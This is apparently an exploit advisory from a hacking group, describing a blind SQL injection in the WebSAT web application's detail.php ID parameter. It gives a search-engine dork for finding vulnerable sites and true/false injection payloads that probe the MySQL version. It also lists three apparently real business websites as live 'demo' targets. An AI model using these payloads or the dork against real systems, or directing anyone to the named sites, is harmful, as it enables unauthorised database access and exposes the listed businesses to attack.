############################################################################
# Exploit Title: WebSAT Blind SQL Injection Vulnerabilitiy
# Google Dork: "powered by WebSAT"
# Date: 1/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Software Link: www.off-ice.com.au
# Version: All Version
# Category:: webapps
# Security Risk:: High
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
# Exploit:
#
#
# http://www.target.com/detail.php?ID=1 [Blind SQL]
#
#
# Test Blind SQL Injection in MYSQL Version 5:
#
#
# True
#
# http://www.target.com/detail.php?ID=1 and substring(@@version,1,1)=5--
#
# False
#
# http://www.target.com/detail.php?ID=1 and substring(@@version,1,1)=4--
#
# Demo:
#
# http://egb.net.au/detail.php?ID=1 [Blind SQL]
# http://www.nostalgicautoparts.com.au/detail.php?ID=1 [Blind SQL]
# http://www.malenycheese.com.au/detail.php?ID=1 [Blind SQL]
#
#
############################################################################
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-
# IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,...
############################################################################
GreetZ : All H4ckCity Member - BHG Members
############################################################################